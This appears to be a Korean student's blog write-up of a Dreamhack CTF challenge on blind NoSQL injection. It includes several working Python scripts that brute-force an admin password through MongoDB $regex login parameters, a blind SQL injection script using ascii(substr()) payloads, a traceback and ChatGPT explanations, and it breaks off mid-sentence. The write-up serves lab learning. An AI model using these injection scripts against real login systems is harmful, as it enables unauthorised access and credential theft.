import requests, string
HOST = 'http://localhost'
ALPHANUMERIC = string.digits + string.ascii_letters
SUCCESS = 'admin'
flag = ''
for i in range(32):
for ch in ALPHANUMERIC:
response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}')
if response.text == SUCCESS:
flag += ch
break
print(f'FLAG: DH{{{flag}}}')
스크립트에서 pymongo 를 import 한 후 DB 와 연결해주면 끝! 바로 원하는 쿼리를 작성해주면 된다.
라는데 ㅇ이게 뭔말이지?
이제 어케 해야될까...........................
일단 스크립트 작성법부터 제대로 모른다
SQL 인젝션부터 다시 복습 ㄱㄱ
Blind SQL Injection 공격 스크립트
#!/usr/bin/python3
import requests
import string
# example URL
url = 'http://example.com/login'
params = {
'uid': '',
'upw': ''
}
# abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~
tc = string.ascii_letters + string.digits + string.punctuation
# 사용할 SQL Injection 쿼리
query = '''
admin' and ascii(substr(upw,{idx},1))={val}--
'''
password = ''
# 비밀번호 길이는 20자 이하라 가정
for idx in range(0, 20):
for ch in tc:
# query를 이용하여 Blind SQL Injection 시도
params['uid'] = query.format(idx=idx, val=ord(ch)).strip("\n")
c = requests.get(url, params=params)
print(c.request.url)
# 응답에 Login success 문자열이 있으면 해당 문자를 password 변수에 저장
if c.text.find("Login success") != -1:
password += chr(ch)
break
print(f"Password is {password}")
비밀번호에 포함될 수 있는 문자를 string 모듈을 사용해 생성하고, 한 바이트씩 모든 문자를 비교하는 반복문을 작성합니다. 반복문 실행 중에 반환 결과가 참일 경우에 페이지에 표시되는 "Login success" 문자열을 찾고, 해당 결과를 반환한 문자를 password 변수에 저장합니다. 반복문을 마치면 "admin" 계정의 비밀번호를 알아낼 수 있습니다.
를 보아하니................. cmd 에다가 bsqli.py 라는 스크립트를 실행시키는 것 같당
난또 어디서 실행시켜야 할지 막막햇다능
근데 이제 생각하니까 pymongo 연결하는 건 헛다리 짚은 것 같다.
그냥 일단 스크립트부터 대충 작성해보자.
연습문제 스크립트를 수정해보자..
import requests, string
HOST = 'http://host1.dreamhack.games:24537/'
ALPHANUMERIC = string.digits + string.ascii_letters
SUCCESS = 'admin'
flag = ''
for i in range(32):
for ch in ALPHANUMERIC:
response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}')
if response.text == SUCCESS:
flag += ch
break
print(f'FLAG: DH{{{flag}}}')
사실 수정한 거라곤 HOST 밖에 없음
ChatGPT 까지 동원해봄
이 코드는 파이썬으로 작성된 스크립트입니다. 이 코드는 웹 서버에 HTTP 요청을 보내고 응답을 분석하여 브루트 포스(Brute Force) 공격을 시도하는 스크립트입니다. 스크립트의 기능은 다음과 같습니다: 1. requests 모듈을 사용하여 HTTP 요청을 보낼 수 있도록 import 합니다. 2. HOST 변수에 웹 서버의 주소를 설정합니다. 3. ALPHANUMERIC 변수에 숫자와 알파벳 문자를 포함한 모든 문자열을 설정합니다. 4. SUCCESS 변수에 'admin' 문자열을 설정합니다. 웹 서버가 'admin' 문자열을 반환하면 브루트 포스가 성공적으로 끝난 것으로 가정합니다. 5. 빈 문자열인 flag 변수를 초기화합니다. 6. 반복문을 사용하여 32자리의 문자열을 찾습니다. 각 반복마다 ALPHANUMERIC 문자열에 있는 문자를 하나씩 시도합니다. 7. 시도한 문자열을 사용하여 requests.get() 함수를 호출하여 웹 서버에 요청을 보냅니다. 8. 웹 서버의 응답을 확인하여 SUCCESS와 일치하면 flag 변수에 해당 문자를 추가합니다. 9. 찾은 문자열을 출력합니다.
ㅇㅋㅇㅋ
1트
C:\Users\gram>python bnosqli.py
Traceback (most recent call last):
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connection.py", line 174, in _new_conn
conn = connection.create_connection(
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\util\connection.py", line 95, in create_connection
raise err
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\util\connection.py", line 85, in create_connection
sock.connect(sa)
ConnectionRefusedError: [WinError 10061] 대상 컴퓨터에서 연결을 거부했으므로 연결하지 못했습니다
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connectionpool.py", line 703, in urlopen
httplib_response = self._make_request(
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connectionpool.py", line 398, in _make_request
conn.request(method, url, **httplib_request_kw)
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connection.py", line 244, in request
super(HTTPConnection, self).request(method, url, body=body, headers=headers)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\http\client.py", line 1283, in request
self._send_request(method, url, body, headers, encode_chunked)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\http\client.py", line 1329, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\http\client.py", line 1278, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\http\client.py", line 1038, in _send_output
self.send(msg)
File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.10_3.10.3056.0_x64__qbz5n2kfra8p0\lib\http\client.py", line 976, in send
self.connect()
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connection.py", line 205, in connect
conn = self._new_conn()
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connection.py", line 186, in _new_conn
raise NewConnectionError(
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x0000022BBEE85600>: Failed to establish a new connection: [WinError 10061] 대상 컴퓨터에서 연결을 거부했으므로 연결하지 못했습니다
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\adapters.py", line 489, in send
resp = conn.urlopen(
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\connectionpool.py", line 787, in urlopen
retries = retries.increment(
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\urllib3\util\retry.py", line 592, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='host1.dreamhack.games', port=24537): Max retries exceeded with url: //login?uid%5B$regex%5D=ad.in&upw%5B$regex%5D=D.%7B0 (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000022BBEE85600>: Failed to establish a new connection: [WinError 10061] 대상 컴퓨터에서 연결을 거부 했으므로 연결하지 못했습니다'))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "C:\Users\gram\bnosqli.py", line 8, in <module>
response = requests.get(f'{HOST}/login?uid[$regex]=ad.in&upw[$regex]=D.{{{flag}{ch}')
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "C:\Users\gram\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\site-packages\requests\adapters.py", line 565, in send
raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='host1.dreamhack.games', port=24537): Max retries exceeded with url: //login?uid%5B$regex%5D=ad.in&upw%5B$regex%5D=D.%7B0 (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000022BBEE85600>: Failed to establish a new connection: [WinError 10061] 대상 컴퓨터에서 연결을 거부했으므로 연결하지 못했습니다'))
import requests
for i in range(50):
response=requests.get("http://host1.dreamhack.games:11943/login?uid[$regex]=.{5}&upw[$regex]=.{"+str(i)+"}")
print("PW 길이:"+str(i)+", 결과:"+str(response.content))
// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}
알고보니 문제 코드에 주석으로 힌트가 있었다
2. 플래그 획득 스크립트
import requests
import string
list=['0','1','2','3','4','5','6','7','8','9']+list(string.ascii_lowercase)+list(string.ascii_uppercase);
url="http://host1.dreamhack.games:23126/login?uid[$regex]=.{5}&upw[$regex]=";
passwd=".{2}{"
for i in range(32):
for j in range(len(list)):
response=requests.get(url+passwd+list[j]+".{"+str(32-i)+"}")
if 'admin' in response.text:
passwd+=list[j]
break;
print(passwd+"}")
이 사람은 admin 이 5글자니까 .{5} 로 필터링하고, passwd 는 DH{{flag}} 형태라서 DH를 .{2}로 필터링 한 것 같다
DH 뒤에 오는 flag는 for문을 통해 문자를 하나씩 얻어온다
for문을 통해 스무고개 게임을 하는 것처럼 request.get 으로 문자가 참인지 질의하는 쿼리를 보낸다.
정리해보자면,
request.get을 했을 때 admin이 return 되게 하는 문자를 passwd에 차곡차곡 저장하는 것이다
.{"+str(32-i)+"} 이부분 이해 안가서 chat GPT 물어봄
물론! 해당 코드에서 .{"+str(32-i)+"} 부분을 설명해드리겠습니다.
이 코드는 블라인드 NoSQL 인젝션(Blind NoSQL Injection) 공격을 수행하여
플래그를 얻기 위한 파이썬 스크립트입니다. 아래 부분을 자세히 설명하겠습니다:
.: MongoDB 정규식 쿼리에서 .은 와일드카드 문자를 나타냅니다.
이 문자는 쿼리 대상 필드에서 어떤 문자든 하나와 일치합니다.
{"+str(32-i)+"}를 단계별로 설명하겠습니다.
i: 변수 i는 현재 반복문의 반복 횟수를 나타냅니다. 0부터 시작하여 31까지 총 32번 반복합니다.
32-i: 이 부분은 passwd를 완전한 32자로 만들기 위해 필요한 나머지 문자의 수를 계산합니다.
반복문이 진행됨에 따라 i가 증가하고, 32-i가 감소하면서
페이로드는 오른쪽에서 왼쪽으로 문자를 검색하게 됩니다.
str(32-i): str() 함수는 32-i의 정수 값을 문자열로 변환합니다.
왜냐하면 이 값을 문자열과 연결해야 하기 때문입니다.
그래서 .{"+str(32-i)+"} 표현식은 MongoDB 정규식 쿼리를 생성합니다.
이 쿼리는 오른쪽에서 왼쪽으로 검색하며, 임의의 문자가 따라오고,
그 뒤에는 와일드카드 문자가 특정한 개수만큼 나오는 경우를 찾습니다.
와일드카드 문자의 개수는 반복문의 현재 반복 횟수에 따라 달라집니다.
요약하면 .{"+str(32-i)+"} 부분은 MongoDB 정규식 쿼리를 구성하여,
현재 반복 횟수에 따라 변화하는 와일드카드 문자의 개수를 사용해
블라인드 NoSQL 인젝션 공격을 통해 passwd 변수를 하나씩 문자를 추가해 나가는 것입니다.
이를 통해 스크립트는 점진적으로 passwd를 구축하고, 플래그를 얻을 수 있게 됩니다.
요약
. 가 정규식에서 와일드 카드이고, 아무(any) 문자를 나타내는 것이다.
그리고 .{5} 는 어떤 글자가 5글자 라는 것을 나타냄
플래그는 32글자니까 저 .{"+str(32-i)+"} 이 표현식을 통해 반복문을 돌며 정규식을 생성한다
list[j] 문자를 하나 획득할 때마다 와일드카드의 글자수를 하나씩 빼는 것!!!
신기하당....
플래그
너무 복붙해서 풀면 좀 그러니까 재구성해보기
import requests, string
list = string.digits + string.ascii_letters
HOST = 'http://host3.dreamhack.games:11240'
url = '/login?uid[$regex]=ad.in&upw[$regex]='
SUCCESS = 'admin'
flag = ''
print("비밀번호 찾기 시작\n");
for i in range(32):
for ch in list:
# f-string 사용하여 변수를 문자열로 포맷팅
response = requests.get(f'{HOST}{url}D.{{{flag}{ch}.{32-i}}}')
if response.text == SUCCESS:
flag += ch
break
print(f'FLAG: DH{{{flag}}}')
위 코드가+ 로 문자열 만들었다면 나는 fstring을 사용해서 좀더 깔끔?하게 만들어 보려햇으나
